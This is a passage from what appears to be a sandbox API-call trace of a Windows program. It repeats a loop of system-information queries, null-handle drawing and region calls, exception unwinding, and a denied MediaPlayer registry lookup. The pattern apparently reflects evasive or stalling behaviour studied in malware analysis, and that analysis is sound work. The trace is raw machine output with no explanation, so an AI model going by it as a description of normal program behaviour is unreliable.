szCSDVersion="Service Pack 1")) returned 1 [0017.599] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.599] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.599] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.599] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.599] BeginPath (hdc=0x0) returned 0 [0017.599] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.599] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.599] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.599] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.600] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.600] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.600] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.600] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.600] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6a040713 [0017.600] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6004027d [0017.600] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af6 [0017.600] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af7 [0017.600] CombineRgn (hrgnDst=0x1040af6, hrgnSrc1=0x6a040713, hrgnSrc2=0x6004027d, iMode=1) returned 1 [0017.600] CombineRgn (hrgnDst=0x1040af7, hrgnSrc1=0x6a040713, hrgnSrc2=0x6004027d, iMode=4) returned 2 [0017.600] CreateSolidBrush (color=0xff) returned 0x2100af5 [0017.600] CreateSolidBrush (color=0xff0000) returned 0x1100af8 [0017.600] DeleteObject (ho=0x1100af8) returned 1 [0017.600] DeleteObject (ho=0x6004027d) returned 1 [0017.600] DeleteObject (ho=0x6a040713) returned 1 [0017.600] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.600] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.600] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.600] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.600] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.600] BeginPath (hdc=0x0) returned 0 [0017.600] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.600] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.600] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.600] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.600] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.600] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.600] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.600] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.601] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6104027d [0017.601] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6b040713 [0017.601] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af9 [0017.601] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040afa [0017.601] CombineRgn (hrgnDst=0x1040af9, hrgnSrc1=0x6104027d, hrgnSrc2=0x6b040713, iMode=1) returned 1 [0017.601] CombineRgn (hrgnDst=0x1040afa, hrgnSrc1=0x6104027d, hrgnSrc2=0x6b040713, iMode=4) returned 2 [0017.601] CreateSolidBrush (color=0xff) returned 0x2100af8 [0017.601] CreateSolidBrush (color=0xff0000) returned 0x1100afb [0017.601] DeleteObject (ho=0x1100afb) returned 1 [0017.601] DeleteObject (ho=0x6b040713) returned 1 [0017.601] DeleteObject (ho=0x6104027d) returned 1 [0017.601] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.601] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.601] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.601] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.601] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.601] BeginPath (hdc=0x0) returned 0 [0017.601] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.601] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.601] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.601] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.601] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.601] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.601] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.601] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.601] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6c040713 [0017.601] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6204027d [0017.602] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040afc [0017.602] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040afd [0017.602] CombineRgn (hrgnDst=0x1040afc, hrgnSrc1=0x6c040713, hrgnSrc2=0x6204027d, iMode=1) returned 1 [0017.602] CombineRgn (hrgnDst=0x1040afd, hrgnSrc1=0x6c040713, hrgnSrc2=0x6204027d, iMode=4) returned 2 [0017.602] CreateSolidBrush (color=0xff) returned 0x2100afb [0017.602] CreateSolidBrush (color=0xff0000) returned 0x1100afe [0017.602] DeleteObject (ho=0x1100afe) returned 1 [0017.602] DeleteObject (ho=0x6204027d) returned 1 [0017.602] DeleteObject (ho=0x6c040713) returned 1 [0017.602] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.602] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.602] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.602] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.602] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.602] BeginPath (hdc=0x0) returned 0 [0017.602] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.602] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.602] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.602] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.602] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.602] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.602] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.602] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.602] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6304027d [0017.602] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6d040713 [0017.602] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aff [0017.602] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b00 [0017.602] CombineRgn (hrgnDst=0x1040aff, hrgnSrc1=0x6304027d, hrgnSrc2=0x6d040713, iMode=1) returned 1 [0017.602] CombineRgn (hrgnDst=0x1040b00, hrgnSrc1=0x6304027d, hrgnSrc2=0x6d040713, iMode=4) returned 2 [0017.602] CreateSolidBrush (color=0xff) returned 0x2100afe [0017.602] CreateSolidBrush (color=0xff0000) returned 0x1100b01 [0017.602] DeleteObject (ho=0x1100b01) returned 1 [0017.603] DeleteObject (ho=0x6d040713) returned 1 [0017.603] DeleteObject (ho=0x6304027d) returned 1 [0017.603] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.603] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.603] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.603] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.603] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.603] BeginPath (hdc=0x0) returned 0 [0017.603] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.603] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.603] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.603] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.603] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.603] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.603] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.603] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.603] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6e040713 [0017.603] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6404027d [0017.603] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b02 [0017.603] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b03 [0017.603] CombineRgn (hrgnDst=0x1040b02, hrgnSrc1=0x6e040713, hrgnSrc2=0x6404027d, iMode=1) returned 1 [0017.603] CombineRgn (hrgnDst=0x1040b03, hrgnSrc1=0x6e040713, hrgnSrc2=0x6404027d, iMode=4) returned 2 [0017.603] CreateSolidBrush (color=0xff) returned 0x2100b01 [0017.603] CreateSolidBrush (color=0xff0000) returned 0x1100b04 [0017.603] DeleteObject (ho=0x1100b04) returned 1 [0017.603] DeleteObject (ho=0x6404027d) returned 1 [0017.603] DeleteObject (ho=0x6e040713) returned 1 [0017.603] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.603] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.604] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.604] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.604] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.604] BeginPath (hdc=0x0) returned 0 [0017.604] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.604] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.604] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.604] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.604] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.604] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.604] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.604] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.604] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6504027d [0017.604] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6f040713 [0017.604] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b05 [0017.604] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b06 [0017.604] CombineRgn (hrgnDst=0x1040b05, hrgnSrc1=0x6504027d, hrgnSrc2=0x6f040713, iMode=1) returned 1 [0017.604] CombineRgn (hrgnDst=0x1040b06, hrgnSrc1=0x6504027d, hrgnSrc2=0x6f040713, iMode=4) returned 2 [0017.604] CreateSolidBrush (color=0xff) returned 0x2100b04 [0017.604] CreateSolidBrush (color=0xff0000) returned 0x1100b07 [0017.604] DeleteObject (ho=0x1100b07) returned 1 [0017.604] DeleteObject (ho=0x6f040713) returned 1 [0017.604] DeleteObject (ho=0x6504027d) returned 1 [0017.604] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.604] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.604] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.604] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.604] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.604] BeginPath (hdc=0x0) returned 0 [0017.604] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.604] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.604] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.604] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.604] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.605] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.605] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.605] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.605] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x70040713 [0017.605] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6604027d [0017.605] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b08 [0017.605] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b09 [0017.605] CombineRgn (hrgnDst=0x1040b08, hrgnSrc1=0x70040713, hrgnSrc2=0x6604027d, iMode=1) returned 1 [0017.605] CombineRgn (hrgnDst=0x1040b09, hrgnSrc1=0x70040713, hrgnSrc2=0x6604027d, iMode=4) returned 2 [0017.605] CreateSolidBrush (color=0xff) returned 0x2100b07 [0017.605] CreateSolidBrush (color=0xff0000) returned 0x1100b0a [0017.605] DeleteObject (ho=0x1100b0a) returned 1 [0017.605] DeleteObject (ho=0x6604027d) returned 1 [0017.605] DeleteObject (ho=0x70040713) returned 1 [0017.605] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.605] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.605] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.605] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.605] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.605] BeginPath (hdc=0x0) returned 0 [0017.605] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.605] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.605] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.605] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.605] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.605] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.605] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.605] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.606] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6704027d [0017.606] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x71040713 [0017.606] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b0b [0017.606] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b0c [0017.606] CombineRgn (hrgnDst=0x1040b0b, hrgnSrc1=0x6704027d, hrgnSrc2=0x71040713, iMode=1) returned 1 [0017.606] CombineRgn (hrgnDst=0x1040b0c, hrgnSrc1=0x6704027d, hrgnSrc2=0x71040713, iMode=4) returned 2 [0017.606] CreateSolidBrush (color=0xff) returned 0x2100b0a [0017.606] CreateSolidBrush (color=0xff0000) returned 0x1100b0d [0017.606] DeleteObject (ho=0x1100b0d) returned 1 [0017.606] DeleteObject (ho=0x71040713) returned 1 [0017.606] DeleteObject (ho=0x6704027d) returned 1 [0017.606] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.606] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.606] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.606] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.606] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.606] BeginPath (hdc=0x0) returned 0 [0017.606] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.606] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.606] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.606] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.606] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.606] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.606] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.606] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.606] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x72040713 [0017.606] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6804027d [0017.606] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b0e [0017.607] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b0f [0017.607] CombineRgn (hrgnDst=0x1040b0e, hrgnSrc1=0x72040713, hrgnSrc2=0x6804027d, iMode=1) returned 1 [0017.607] CombineRgn (hrgnDst=0x1040b0f, hrgnSrc1=0x72040713, hrgnSrc2=0x6804027d, iMode=4) returned 2 [0017.607] CreateSolidBrush (color=0xff) returned 0x2100b0d [0017.607] CreateSolidBrush (color=0xff0000) returned 0x1100b10 [0017.607] DeleteObject (ho=0x1100b10) returned 1 [0017.607] DeleteObject (ho=0x6804027d) returned 1 [0017.607] DeleteObject (ho=0x72040713) returned 1 [0017.607] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.607] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.607] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.607] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.607] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.607] BeginPath (hdc=0x0) returned 0 [0017.607] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.607] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.607] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.607] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 